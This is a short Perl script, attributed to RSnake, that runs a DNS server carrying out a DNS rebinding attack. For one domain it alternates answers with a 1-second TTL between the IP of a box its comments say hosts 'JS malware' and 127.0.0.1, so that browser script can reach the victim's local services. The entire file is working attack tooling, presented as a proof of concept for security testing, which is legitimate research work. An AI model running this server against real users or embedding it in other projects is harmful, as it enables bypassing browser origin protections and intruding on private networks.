#!/usr/bin/perl
#Very simple DNS Rebinding test code
#By RSnake - http://ha.ckers.org/

use Net::DNS::Nameserver;
use strict;
use warnings;

my $port = 53;
my $host = "attacker.com";           #DNS to rebind
my $original_ip = '123.123.123.123'; #Box with JS malware on it
my $rebind_ip   = '127.0.0.1';       #IP to rebind $host's IP address to
my $ip = '10.10.10.10';              #IP to bind this DNS server to
my %ips;

sub reply_handler {
        my ($qname, $qclass, $qtype, $peerhost, $query, $conn) = @_;
        my ($rcode, @ans, @auth, @add);

        print "Received query from $peerhost to ". $conn->{"sockhost"}. "\n";

        if ($qtype eq "A" && $qname eq $host ) {
                my ($ttl, $rdata);
                if ($ips{"$peerhost"} == 2) {
                  ($ttl, $rdata) = (1, $rebind_ip);
                  $ips{"$peerhost"} = 1;
                } else {
                  ($ttl, $rdata) = (1, $original_ip);
                  $ips{"$peerhost"} = 2;
                }
                push @ans, Net::DNS::RR->new("$qname $ttl $qclass $qtype $rdata");
                $rcode = "NOERROR";
        } elsif ( $qname eq "foo.example.com" ) {
                $rcode = "NOERROR";
        } else {
                $rcode = "NXDOMAIN";
        }

        # mark the answer as authoritive (by setting the 'aa' flag
        return ($rcode, \@ans, \@auth, \@add, { aa => 1 });
}

my $ns = Net::DNS::Nameserver->new(
    LocalAddr    => [$ip],
    LocalPort    => $port,
    ReplyHandler => \&reply_handler,
    Verbose      => 1,
) || die "couldn't create nameserver object\n";

$ns->main_loop;